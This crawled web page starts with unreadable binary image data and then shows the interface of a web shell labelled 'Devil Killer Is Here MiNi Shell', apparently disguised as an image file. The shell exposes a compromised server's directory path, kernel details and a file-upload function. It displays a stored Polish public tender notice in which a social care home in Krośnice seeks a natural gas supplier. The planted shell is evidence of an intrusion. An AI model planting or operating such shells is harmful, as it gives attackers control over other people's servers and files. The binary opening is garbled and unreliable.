JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241103/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241103/0057549801-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Kompleksowa dostawa gazu ziemnego wysokometanowego typu E (zakup i dystrybucja) dla celów grzewczych do obiektów Domu Pomocy Społecznej w Krośnicach </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Dom Pomocy Społecznej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 930655847</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kwiatowa</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Krośnice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">56-320</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL518 - Wrocławski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">713846105</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@dpskrosnice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://dpskrosnice.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ochrona socjalna</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Kompleksowa dostawa gazu ziemnego wysokometanowego typu E (zakup i dystrybucja) dla celów grzewczych do obiektów Domu Pomocy Społecznej w Krośnicach </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4fc6053b-7d87-4df0-bc48-943f7c16b9c1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00575498</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-11-03</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00099044/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Kompleksowa dostawa gazu ziemnego wysokometanowego typu E dla celów grzewczych do obiektów DPS Krośnice</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-4fc6053b-7d87-4df0-bc48-943f7c16b9c1 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia odbywa się przy użyciu<br/>środków komunikacji elektronicznej, za pośrednictwem platformy pod adresem:<br/>https://ezamowienia.gov.pl/. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy<br/>posługują się numerem ogłoszenia (BZP, TED lub ID postępowania).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Ofertę, oświadczenia, o których mowa<br/>w art. 125 ust. 1 p.z.p., podmiotowe środki dowodowe, pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby<br/>sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach .txt, .rtf, .pdf, .doc,<br/>.docx, .odt . Ofertę, a także oświadczenie o jakim mowa w Rozdziale X ust. 1 SWZ składa się, pod rygorem nieważności, w formie<br/>elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i<br/>oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu pod adresem:<br/>https://media.ezamowienia.gov.pl/ pod/2021/10/Oferty-5.1.pdf.oraz Warunkach korzystania z elektronicznej platformy usług<br/>administracji publicznej (ePUAP).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia<br/>4 maja 2016 r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/>1) administratorem Pani/Pana danych osobowych jest Dyrektor DPS Krośnice z siedzibą ul. Kwiatowa 9, 56-320 Krośnice;<br/>2) administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod adresem e-mail: dyrektor@dpskrosnice.pl, tel: 713846105;<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym<br/>postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie podstawowym bez negocjacji;<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 74 ustawy P.Z.P.<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 P.Z.P. przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisanych ustawy P.Z.P., związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego pod nazwą<br/>„Kompleksowa dostawa gazu ziemnego wysokometanowego typu E (zakup i dystrybucja) dla celów grzewczych do obiektów Domu Pomocy Społecznej w Krośnicach” prowadzonym w trybie podstawowym bez negocjacji w<br/>zw. z art. 275 ust. 1 ustawy PZP;<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22<br/>RODO.<br/>8) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego<br/>prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania<br/>dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DPS/AG-230/02/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiot zamówienia obejmował będzie kompleksową dostawę (zakup i świadczenie usług dystrybucji) paliwa gazowego<br/>– gazu ziemnego wysokometanowego typu E (GZ-50) do instalacji niżej wymienionych obiektów Domu Pomocy Społecznej<br/>w Krośnicach w okresie od 01.12.2024 r. do 30.11.2025 r., lecz nie wcześniej niż z dniem skutecznego rozwiązania aktualnie<br/>obowiązujących umów oraz pozytywnie przeprowadzonej procedurze zmiany Wykonawcy:<br/>1.1. budynek przy ulicy Kwiatowej 2, 56-320 Krośnice.<br/>Szacunkowe zapotrzebowanie paliwa gazowego w grupie taryfowej (OSD) W – 5.1 obliczono na podstawie zużycia w okresie<br/>12 m-cy roku 2023/2024 – 54 600 m³ x 11,57 = 631 722,00 kWh – należy założyć możliwość 15% zmniejszenia lub<br/>zwiększenia zużycia. Nr punktu poboru gazu 8018590365500019067501 ul. Kwiatowa 2, 56-320 Krośnice, grupa taryfowa<br/>W-5.1 moc umowna 274 KW<br/>1.2. budynek przy ulicy Kwiatowej 9, 56-320 Krośnice.<br/>Szacunkowe zapotrzebowanie paliwa gazowego w grupie taryfowej (OSD) W – 4 na podstawie zużycia w okresie 12 m-cy<br/>roku 2023/2024 – 26 300 m³ x 11,57 = 304 291,00 kWh - należy założyć możliwość 15% zmniejszenia lub zwiększenia<br/>zużycia. Nr punktu poboru gazu 8018590365500033853586 ul. Kwiatowa 9, 56-320 Krośnice, grupa taryfowa W-4 moc<br/>umowna&lt;110KW.<br/>1.3. budynek przy ulicy Kwiatowej 9a, 56-320 Krośnice.<br/>Szacunkowe zapotrzebowanie paliwa gazowego w grupie taryfowej (OSD) W – 3.6 obliczono na podstawie zużycia w okresie<br/>12 m-cy roku 2023/2024 – 4 175 m³ x 11,57= 48 304,75 kWh - należy założyć możliwość 15% zmniejszenia lub zwiększenia<br/>zużycia. Nr punktu poboru gazu 8018590365500033853760 ul. Kwiatowa 9a, 56-320 Krośnice, grupa taryfowa W-3.6 moc<br/>umowna&lt;110KW.<br/>2. Łączna ilość paliwa gazowego, które będzie dostarczone w okresie umowy do trzech punktów poboru szacuje się na<br/>85 075 m³ x 11,57 = 984 317,75 KWh. Powyższa ilość gazu jest wartością szacowaną i może ulec zmianie. W przypadku<br/>różnicy między zużyciem planowanym a faktycznym, Wykonawca nie będzie z tego tytułu dochodził roszczeń finansowych<br/>innych niż te wynikające z ilości zużytego gazu. Do obliczeń przyjęto uśredniony współczynnik konwersji na poziomie 11,57.<br/>3. Zamawiający pobierany gaz ziemny przeznaczy na własne cele opałowe, objęte zwolnieniem z akcyzy, zgodnie z art 31b<br/>ust. 2 ustawy o podatku akcyzowym. Gaz ziemny powinien spełniać standardy techniczne zgodnie z zapisami ustawy Prawo<br/>energetyczne oraz rozporządzeniami wykonawczymi do tej ustawy i Polskimi Normami.<br/>4. Wykonawca zobowiązany jest do dokonania wszelkich czynności i uzgodnień z Operatorem Systemu Dystrybucyjnego<br/>(OSD) niezbędnych do przeprowadzenia procedury zmiany sprzedawcy, na podstawie odrębnie udzielonego pełnomocnictwa.<br/>5. Wykonawca odpowiedzialny będzie za przebieg i terminowe wykonanie zamówienia.<br/>6. Wykonawca powinien posiadać aktualną umowę z Operatorem Systemu Dystrybucyjnego (chyba, że sam jest operatorem),<br/>działającą na terenie Zamawiającego i umożliwiającą sprzedaż paliwa gazowego za pośrednictwem sieci dystrybucyjnej do<br/>punktów poboru.<br/>7. Obecnie sprzedaż paliwa gazowego na potrzeby Zamawiającego realizowana jest w oparciu o umowę kompleksową z<br/>PGNiG Obrót Detaliczny sp. z o.o. ul. Jana Kazimierza 3 01-248 Warszawa. Usługę dystrybucji paliwa gazowego do instalacji<br/>znajdującej się w obiekcie, wykonuje Polska Spółka Gazownictwa Sp. z o.o. w Tarnowie, ul. Wojciecha Bandrowskiego 16<br/>NIP 5252496411.<br/>Obecnie Dom Pomocy Społecznej korzysta z ochrony taryfowej zgodnie z Ustawą z dnia 26 stycznia 2022 r. o<br/>szczególnych rozwiązaniach służących ochronie odbiorców paliw gazowych w związku z sytuacją na rynku gazu<br/>(poz.202). Do sprzedawcy gazy tj. PGNiG OD zostały złożone stosowne oświadczenia odbiorcy paliw gazowych<br/>(dotyczące 3 punktów poboru gazy), zgodnie z Rozporządzeniem Ministra Klimatu i Środowiska z dnia 28 styczna 2022<br/>r. (poz.212). Do dokumentacji zostają dołączone oświadczenia dotyczące trzech punktów poboru gazu.<br/>8. Dostarczenie gazu ma się odbywać na podstawie umowy zawierającej postanowienia umowy sprzedaży i umowy o<br/>świadczenie usług przesyłania lub dystrybucji gazu (umowy kompleksowej) i być wykonana na warunkach, określonych przepisami ustawy z dnia 10 kwietnia 1997 r. Prawo energetyczne (Dz.U.2020.833), Kodeksu Cywilnego oraz przepisami<br/>wykonawczymi, wydanymi na ich podstawie.<br/>9. Gaz ma być dostarczony do punktu zdawczo-odbiorczego, którym jest zespół urządzeń służących do przyłączania sieci<br/>wewnętrznej, będącej własnością Zamawiającego z siecią gazową operatora systemu. Zespół urządzeń gazowych składa się z<br/>trzech gazomierzy.<br/>10. Paliwo u Zamawiającego zużywane będzie przez cztery kotły gazowe o mocy 37 KW grupa taryfowa W-3.6, 130 KW<br/>grupa taryfowa W-4, 200 KW i 270 KW grupa taryfowa W-5.1. Deklaracja zużycia gazu w poszczególnych okresach zawarta<br/>jest w załączniku nr 01 do SWZ (zamówienie ilości gazu).<br/>11. Koszty ponoszone w całym okresie korzystania z przedmiotu zamówienia zostały uwzględnione przez wyszacowanie<br/>zużycia gazu w ilości w poszczególnych grupach taryfowych:<br/>Grupa W-3.6 – 48 304,75 KWh.<br/>Grupa W- 4 - 304 291 KWh<br/>Grupa W- 5.1 – 631 722 KWh<br/>Na koszty korzystania z przedmiotu zamówienia w w/w okresie składają się: opłata za paliwo gazowe, opłata abonamentowa,<br/>opłata dystrybucyjna stała i opłata dystrybucyjna zmienna.<br/>12. Szczegółowy wykaz ilości zamawianego paliwa gazowego w roku gazowym 2024/2025 zawiera załącznik nr 1 do<br/>SWZ – zamówienie ilości paliwa gazowego w roku gazowym 2024/2025 - stanowiący integralną część opisu przedmiotu<br/>niniejszego zamówienia tj. SWZ.<br/>12. Odbiorca zakwalifikowany jest przez właściwy dla niego system dystrybucji (OSD) do grup taryfowych: W- 3.6, W-4 i<br/>W-5.1.<br/>13. Wykonawca wystawi faktury zgodnie z danymi: Nabywca: Powiat Milicki, ul. Wojska Polskiego 38, 56-300 Milicz, NIP:<br/>916-13-12-494, Odbiorca: Dom Pomocy Społecznej w Krośnicach ul. Kwiatowa 9, 56-320 Krośnice, NIP: 916-11-80-070 .<br/>14. W związku z zminimalizowaniem ryzyka zakażenia wirusem Covid -19, wykonawca jest zobowiązany do przestrzegania<br/>reżimu sanitarnego polegającego na dezynfekcji rąk przed wejściem do budynku, ograniczeniem/unikaniem kontaktów z<br/>pracownikami i mieszkańcami dps-u a w razie kiedy nie jest to możliwe zasłanianiem ust i nosa, kontrolowaniu temperatury<br/>ciała przed rozpoczęciem pracy, wykonywaniem pracy bez objawów infekcji, a także do przestrzegania innych zasad<br/>sanitarnych określonych przez Zamawiającego i na polecenie Zamawiającego.<br/>15. Wykonawca zobowiązany jest zrealizować zamówienie na zasadach i warunkach opisanych w istotnych postanowieniach<br/>umowy stanowiących załącznik nr 2 do SWZ.<br/>16. Zamawiający nie dopuszcza możliwości składania ofert częściowych.<br/>17. Zamawiający nie przewiduje zawarcia umowy ramowej.<br/>18. Zamawiający nie przewiduje wyboru oferty najkorzystniejszej z zastosowaniem aukcji elektronicznej.<br/>19. Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów.<br/>20. Zamawiający nie dopuszcza składania ofert wariantowych oraz w postaci katalogów elektronicznych.<br/>21. Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt. 7 i 8 p.z.p.<br/>Zamawiający przewiduje udzielenie zamówień, o których mowa w art. 214 ust. 1 pkt 8 ustawy Pzp w następujących<br/>przypadkach:<br/>- konieczności udzielenia zamówienia po zakończeniu obowiązywania umowy, a przed wejściem w życie kolejnej umowy,<br/>która zostanie zawarta w wyniku rozstrzygnięcia nowego przetargu na kompleksową dostawę paliwa gazowego. Udzielenie<br/>powyższych zamówień nastąpi przy zachowaniu tych samych warunków, w tym cenowych, jak zamówienie podstawowe<br/>wynikających ze złożonej oferty przetargowej wykonawcy, z którym zawarto umowę „podstawową” oraz odpowiedniej stawki<br/>VAT. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09123000-7 - Gaz ziemny</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">65200000-5 - Przesył gazu i podobne usługi</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt. 7 i 8 p.z.p.<br/>Zamawiający przewiduje udzielenie zamówień, o których mowa w art. 214 ust. 1 pkt 8 ustawy Pzp w następujących<br/>przypadkach:<br/>- konieczności udzielenia zamówienia po zakończeniu obowiązywania umowy, a przed wejściem w życie kolejnej umowy,<br/>która zostanie zawarta w wyniku rozstrzygnięcia nowego przetargu na kompleksową dostawę paliwa gazowego. Udzielenie<br/>powyższych zamówień nastąpi przy zachowaniu tych samych warunków, w tym cenowych, jak zamówienie podstawowe<br/>wynikających ze złożonej oferty przetargowej wykonawcy, z którym zawarto umowę „podstawową” oraz odpowiedniej stawki<br/>VAT.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami:<br/>- kryterium najniższa łączna cena oferty brutto: waga 60 % (60 pkt.), sposób oceny - minimalizacja<br/>- kryterium „termin płatności faktury”: waga max. 40% (40 pkt.)<br/>Ocena ofert zostanie przeprowadzona wyłącznie w oparciu o przedstawione wyżej kryteria. Oferty będą oceniane w odniesieniu do<br/>najkorzystniejszych warunków przedstawionych przez wykonawców w zakresie każdego z kryterium.<br/>Oferta wypełniająca w najwyższym stopniu wymagania określone w każdym kryterium otrzyma maksymalną ilość punktów.<br/>Pozostałym wykonawcom, wypełniającym wymagania kryterialne, przypisana zostanie odpowiednio mniejsza (proporcjonalnie<br/>mniejsza) ilość punktów.<br/>2. Zamawiający za najkorzystniejszą uzna ofertę, która nie będzie podlegała odrzuceniu oraz uzyska największą sumę punktów<br/>wyliczoną zgodnie ze wzorem: Najkorzystniejsza oferta = liczba punktów cena + liczba punktów za termin płatności faktury.<br/>3. Jeżeli nie będzie można dokonać wyboru oferty najkorzystniejszej ze względu na to, że dwie lub więcej ofert przedstawia taki sam<br/>bilans ceny i pozostałych kryteriów oceny ofert, Zamawiający spośród tych ofert dokona wyboru oferty z najniższą ceną. W<br/>pozostałych przypadkach będą miały zastosowanie przepisy ustawy PZP.<br/>4. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym<br/>zaoferowanej ceny.<br/>5 .Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">kryterium „termin płatności faktury”: waga max. 40% (40 pkt.)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w<br/>Rozdziale IX SWZ 